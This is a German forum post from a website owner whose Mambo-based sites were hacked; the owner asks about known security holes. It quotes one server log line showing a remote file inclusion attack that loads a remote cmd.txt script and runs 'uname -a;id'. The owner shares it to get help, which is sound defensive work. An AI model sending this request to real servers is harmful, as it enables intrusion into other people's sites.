LinkBack URL
About LinkBacks
Hallo Leute,
zwei meiner Websites sind diese Nacht von einem Hackerteam "bearbeitet" worden. Die IP über die der Angriff stattfand erfolgte über einen brasilianischen Provider.
Zum Glück fährt mein Webspace-Provider jede Nacht ein Backup, so dass alle Daten wiederhergestellt werden konnten. Ich selber führe nur einmal die Woche eine Sicherung auf die Festplatte durch, somit bin ich sehr froh, dass ich nicht den billigsten Anbieter gewählt habe.
Jetzt meine Frage: Gibt es bekannte Sicherlöcher in Mambo? Mein Provider sagte, dass anhand der Einträge in den Logdateien zu sehen ist, dass der Angriff über die PHP-Skripte von Mambo erfolgte.
Leider sitze ich gerade vor einem Analogzugang und kann die Logdateien noch nicht herunterladen, hier aber mal eine Zeile aus dem Log:
Ich bin für jeden Tipp dankbar. Bitte helft mir mein Mambo sicher zu machen. Vielen Dank!GET //modules/mod_mainmenu.php?mosConfig_absolute_path=
http://xxx.xxx.xxx.xxx/cmd.txt?&cmd=uname%20-a;id
HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Zitieren
Lesezeichen